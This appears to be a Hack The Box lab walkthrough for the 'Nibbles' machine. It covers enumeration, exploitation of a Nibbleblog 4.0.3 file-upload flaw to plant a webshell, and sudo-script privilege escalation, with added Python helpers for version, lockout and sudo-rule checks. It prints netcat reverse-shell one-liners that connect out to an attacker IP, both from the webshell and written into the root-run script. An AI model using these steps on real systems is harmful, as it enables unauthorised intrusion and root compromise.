HTB - Nibbles

Getting Root

  1. We notice that the application is running Nibbleblog version 4.0.3, which has an authenticated arbitrary file upload in its "My image" plugin. The admin password (nibbles) is found by guessing.

  2. We upload a PHP webshell through that plugin and get a shell as user nibbler, who may run a bash script inside his own home directory as root via sudo without a password. Since nibbler owns that script, we replace it with a reverse shell and run it with sudo to get root.

Tools Used:

nmap, dirsearch, searchsploit

Nmap

nmap -sC -sV -p- -oA nmap/allports 10.10.10.75                  
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-13 21:50 EDT
Nmap scan report for 10.10.10.75
Host is up (0.061s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enumeration

Dirsearch

sudo dirsearch -u http://10.10.10.75/nibbleblog -E

 _|. _ _  _  _  _ _|_    v0.3.9
(_||| _) (/_(_|| (_| )

Extensions: php, asp, aspx, jsp, js, html, do, action | HTTP method: get | Threads: 10 | Wordlist size: 8674

Error Log: /opt/dirsearch/logs/errors-20-04-13_21-56-23.log

Target: http://10.10.10.75/nibbleblog

[21:56:23] Starting: 
[21:56:25] 403 -  308B  - /nibbleblog/.ht_wsr.txt
[21:56:25] 403 -  301B  - /nibbleblog/.hta
[21:56:25] 403 -  310B  - /nibbleblog/.htaccess-dev
[21:56:25] 403 -  312B  - /nibbleblog/.htaccess-local
[21:56:25] 403 -  312B  - /nibbleblog/.htaccess-marco
[21:56:25] 403 -  310B  - /nibbleblog/.htaccess.BAK
[21:56:25] 403 -  311B  - /nibbleblog/.htaccess.bak1
[21:56:25] 403 -  310B  - /nibbleblog/.htaccess.old
[21:56:25] 403 -  311B  - /nibbleblog/.htaccess.orig
[21:56:25] 403 -  313B  - /nibbleblog/.htaccess.sample
[21:56:25] 403 -  311B  - /nibbleblog/.htaccess.save
[21:56:25] 403 -  310B  - /nibbleblog/.htaccess.txt
[21:56:25] 403 -  312B  - /nibbleblog/.htaccess_extra
[21:56:25] 403 -  311B  - /nibbleblog/.htaccess_orig
[21:56:25] 403 -  309B  - /nibbleblog/.htaccess_sc
[21:56:25] 403 -  309B  - /nibbleblog/.htaccessBAK
[21:56:25] 403 -  309B  - /nibbleblog/.htaccessOLD
[21:56:25] 403 -  310B  - /nibbleblog/.htaccessOLD2
[21:56:25] 403 -  307B  - /nibbleblog/.htaccess~
[21:56:25] 403 -  305B  - /nibbleblog/.htgroup
[21:56:25] 403 -  310B  - /nibbleblog/.htpasswd-old
[21:56:25] 403 -  311B  - /nibbleblog/.htpasswd_test
[21:56:25] 403 -  307B  - /nibbleblog/.htpasswds
[21:56:25] 403 -  305B  - /nibbleblog/.htusers
[21:56:31] 301 -  321B  - /nibbleblog/admin  ->  http://10.10.10.75/nibbleblog/admin/
[21:56:31] 200 -    1KB - /nibbleblog/admin.php 
[21:56:31] 200 -    2KB - /nibbleblog/admin/
[21:56:32] 403 -  312B  - /nibbleblog/admin/.htaccess
[21:56:32] 200 -    2KB - /nibbleblog/admin/?/login
[21:56:32] 301 -  332B  - /nibbleblog/admin/js/tinymce  ->  http://10.10.10.75/nibbleblog/admin/js/tinymce/
[21:56:32] 200 -    2KB - /nibbleblog/admin/js/tinymce/
[21:56:50] 301 -  323B  - /nibbleblog/content  ->  http://10.10.10.75/nibbleblog/content/       
[21:56:57] 200 -    3KB - /nibbleblog/index.php                                                 
[21:56:57] 200 -    3KB - /nibbleblog/index.php/login/
[21:56:57] 200 -   78B  - /nibbleblog/install.php
[21:56:58] 301 -  325B  - /nibbleblog/languages  ->  http://10.10.10.75/nibbleblog/languages/   
[21:56:59] 200 -   34KB - /nibbleblog/LICENSE.txt
[21:57:06] 301 -  323B  - /nibbleblog/plugins  ->  http://10.10.10.75/nibbleblog/plugins/
[21:57:08] 200 -    5KB - /nibbleblog/README    
[21:57:14] 301 -  322B  - /nibbleblog/themes  ->  http://10.10.10.75/nibbleblog/themes/         
                                                
Task Completed

The interesting results:

[21:56:31] 200 -    1KB - /nibbleblog/admin.php
[21:56:50] 301 -  323B  - /nibbleblog/content  ->  http://10.10.10.75/nibbleblog/content/
[21:57:08] 200 -    5KB - /nibbleblog/README

# Found under
http://10.10.10.75/nibbleblog/README

====== Nibbleblog ======
Version: v4.0.3
Codename: Coffee
Release date: 2014-04-01


# Found under
http://10.10.10.75/nibbleblog/content/private/users.xml
Username: admin
(see screenshot below)

# Note that content/private/ is served directly by Apache, so the user database is readable without logging in.

Checking the admin page, we were able to guess the password. Nibbleblog records failed logins per source IP in this same users.xml (blacklist entries) and can block the address after repeated failures, so keep manual guesses to a handful rather than brute-forcing.

# On the admin page
Username: admin
Password: nibbles

# Discovered the creds by guessing

http://10.10.10.75/nibbleblog/admin.php
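The two leaked files above are worth a small script, since the same check applies to any Nibbleblog install met during enumeration: README gives the exact version, and content/private/users.xml (which should never be web-readable) gives the usernames together with the per-IP failed-login bookkeeping that drives the lockout. This is an added example and not code from the original writeup: the README text is copied from above, while the users.xml sample is constructed and its element layout is an assumption (only the user/username and blacklist/ip elements are relied on).

```python
import re
import xml.etree.ElementTree as ET

# Copied from the README shown above.
SAMPLE_README = """====== Nibbleblog ======
Version: v4.0.3
Codename: Coffee
Release date: 2014-04-01
"""

# Constructed sample of content/private/users.xml. The element layout is an
# assumption; only <user username="..."> and <blacklist ip="..."> are relied on.
SAMPLE_USERS_XML = """<?xml version="1.0" encoding="UTF-8"?>
<users>
  <user username="admin">
    <id type="integer">0</id>
    <session_fail_count type="integer">0</session_fail_count>
    <session_date type="integer">1514544131</session_date>
  </user>
  <blacklist type="string" ip="10.10.10.1">
    <date type="integer">1512943176</date>
    <fail_count type="integer">1</fail_count>
  </blacklist>
</users>
"""

# Versions the arbitrary-file-upload advisory names (only 4.0.3 on this page).
AFFECTED_VERSIONS = {(4, 0, 3)}


def parse_version(readme_text):
    """Return the version from a Nibbleblog README as an int tuple, or None."""
    m = re.search(r"^Version:\s*v?(\d+)\.(\d+)\.(\d+)\s*$", readme_text, re.M)
    return tuple(int(x) for x in m.groups()) if m else None


def is_affected(version):
    return version in AFFECTED_VERSIONS


def parse_users(xml_text):
    """Map each username to its recorded failed-login count."""
    root = ET.fromstring(xml_text)
    return {
        u.get("username"): int(u.findtext("session_fail_count", default="0"))
        for u in root.iter("user") if u.get("username")
    }


def parse_blacklist(xml_text):
    """Map each blacklisted source IP to its failure count: the login throttle state."""
    root = ET.fromstring(xml_text)
    return {
        b.get("ip"): int(b.findtext("fail_count", default="0"))
        for b in root.iter("blacklist") if b.get("ip")
    }


def assess(readme_text, users_xml):
    """One-shot summary of what the two leaked files tell an attacker."""
    version = parse_version(readme_text)
    return {
        "version": version,
        "affected": is_affected(version),
        "users": parse_users(users_xml),
        "blacklist": parse_blacklist(users_xml),
    }


if __name__ == "__main__":
    print(assess(SAMPLE_README, SAMPLE_USERS_XML))
```

Feed it the real files with two curl calls (README and content/private/users.xml) before touching the login form: if your own address already appears in the blacklist, guessing further will only lock you out.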

Searchsploit

searchsploit Nibbleblog                                                                                                                                       
----------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                       |  Path                                  
                                                                                                                                                     | (/usr/share/exploitdb/)                
----------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Nibbleblog 3 - Multiple SQL Injections                                                                                                               | exploits/php/webapps/35865.txt         
Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit)                                                                                                | exploits/php/remote/38489.rb           
----------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------

Exploit

Searchsploit finds an exploit for our exact version, but it is a Metasploit module. A quick Google search for the same issue turns up the original advisory, whose proof of concept reads:

3. Proof of Concept

    Obtain Admin credentials (for example via Phishing via XSS which can be gained via CSRF, see advisory about CSRF in NibbleBlog 4.0.3)
    Activate My image plugin by visiting http://localhost/nibbleblog/admin.php?controller=plugins&action=install&plugin=my_image
    Upload PHP shell, ignore warnings
    Visit http://localhost/nibbleblog/content/private/plugins/my_image/image.php. This is the default name of images uploaded via the plugin.  

According to the PoC we can upload a PHP file through the My image plugin and simply ignore the warnings it prints (the plugin tries to treat the upload as an image). To do this we must be logged in to the admin page.

We know the username admin but not the password. A few manual login attempts later we guess it as nibbles (the box name). Now we can upload our PHP webshell.

Upload the webshell

We see the warnings and ignore them.

Visiting the page named in the PoC takes us to the webshell:

http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php

Through the webshell we execute the following to get a reverse shell on the box (listener on 10.10.14.38:9001):

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.38 9001>/tmp/f

Privilege Escalation

# Checking sudo permissions: nibbler may run one bash script as root without a password
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ sudo -l
sudo: unable to resolve host Nibbles: Connection timed out
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh


# Checking the directory the script should live in
nibbler@Nibbles:/home/nibbler$ ls -la
ls -la
total 20
drwxr-xr-x 3 nibbler nibbler 4096 Dec 29  2017 .
drwxr-xr-x 3 root    root    4096 Dec 10  2017 ..
-rw------- 1 nibbler nibbler    0 Dec 29  2017 .bash_history
drwxrwxr-x 2 nibbler nibbler 4096 Dec 10  2017 .nano
-r-------- 1 nibbler nibbler 1855 Dec 10  2017 personal.zip
-r-------- 1 nibbler nibbler   33 Dec 10  2017 user.txt

# We don't see the personal directory, only a zip file, so we extract it
nibbler@Nibbles:/home/nibbler$ unzip personal.zip
unzip personal.zip
Archive:  personal.zip
   creating: personal/
   creating: personal/stuff/
  inflating: personal/stuff/monitor.sh  


# The script is world-writable and owned by nibbler, so we can put anything we like in it.
# Even a read-only script would not have helped: the sudo rule points into nibbler's own home
# directory, so nibbler can delete and recreate the file (or create the whole path, as it was
# missing before the unzip). sudo trusts the path, not the content.
nibbler@Nibbles:/home/nibbler/personal/stuff$ ls -la
ls -la
total 12
drwxr-xr-x 2 nibbler nibbler 4096 Dec 10  2017 .
drwxr-xr-x 3 nibbler nibbler 4096 Dec 10  2017 ..
-rwxrwxrwx 1 nibbler nibbler 4015 May  8  2015 monitor.sh


# Overwrote the bash script with a reverse shell pointing at our second listener (port 9002)
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.38 9002>/tmp/f' > monitor.sh

# Executed the script with sudo
nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo /home/nibbler/personal/stuff/monitor.sh

# On our listener we get a shell as root
rlwrap nc -lnvp 9002
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9002
Ncat: Listening on 0.0.0.0:9002
Ncat: Connection from 10.10.10.75.
Ncat: Connection from 10.10.10.75:45840.
# id
uid=0(root) gid=0(root) groups=0(root)
# 
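The misconfiguration above is general: a sudo rule whose target sits somewhere the invoking user can write (the file itself, or a directory on its path, including a path that does not exist yet, as personal/stuff/ did not before the unzip) hands that user root. The check below is an added example, not part of the original writeup: it parses `sudo -l` output (the sample is the output shown above, copied into the script) and reports each rule whose target the current user could replace. The demo() helper builds a throwaway directory to exercise both cases. A sticky-bit directory such as /tmp would be a false positive, since you can write there but not remove another user's file.

```python
import os
import re
import tempfile

# The `sudo -l` output shown above, used as sample input.
SAMPLE_SUDO_L = r"""Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
"""

# "(runas) TAG: TAG: /abs/path args" as printed by sudo -l; ALL-style rules are skipped.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>/\S+)")


def parse_rules(text):
    """Extract (runas, tags, command path) from the command section of sudo -l."""
    rules, in_cmds = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_cmds = True
            continue
        m = RULE_RE.match(line) if in_cmds else None
        if m:
            tags = [t for t in m["tags"].replace(" ", "").split(":") if t]
            rules.append({"runas": m["runas"].strip(), "tags": tags, "cmd": m["cmd"]})
    return rules


def nearest_existing(path):
    """Walk up until a component exists; that is where a missing path would be created."""
    while not os.path.exists(path):
        parent = os.path.dirname(path)
        if parent == path:
            break
        path = parent
    return path


def controllable(path):
    """True if we could make sudo run our content at this path: the file is writable,
    or the nearest existing directory on its path is (delete/recreate, or create it)."""
    if os.access(path, os.W_OK):              # False when the file does not exist
        return True
    return os.access(nearest_existing(os.path.dirname(path)), os.W_OK)


def audit(text):
    """List (command, runas, controllable) for every parsed rule."""
    return [(r["cmd"], r["runas"], controllable(r["cmd"])) for r in parse_rules(text)]


def demo():
    """Self-contained check: an existing world-writable script, and a target under a
    not-yet-created subdirectory of a directory we own. Both should be flagged."""
    d = tempfile.mkdtemp()
    existing = os.path.join(d, "monitor.sh")
    with open(existing, "w") as f:
        f.write("#!/bin/bash\necho monitoring\n")
    os.chmod(existing, 0o777)
    missing = os.path.join(d, "personal", "stuff", "monitor.sh")
    text = ("User demo may run the following commands on demo:\n"
            f"    (root) NOPASSWD: {existing}\n"
            f"    (root) NOPASSWD: {missing}\n")
    return audit(text)


if __name__ == "__main__":
    for cmd, runas, bad in audit(SAMPLE_SUDO_L) + demo():
        print(f"{'CONTROLLABLE' if bad else 'ok          '} ({runas}) {cmd}")
```

Run it as the low-privilege user on the box with `sudo -l | python3 sudo_check.py` after swapping SAMPLE_SUDO_L for sys.stdin.read(); on Nibbles it flags monitor.sh because /home/nibbler is nibbler's own directory, which is exactly why the fix is a root-owned script in a root-owned directory, not a chmod.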
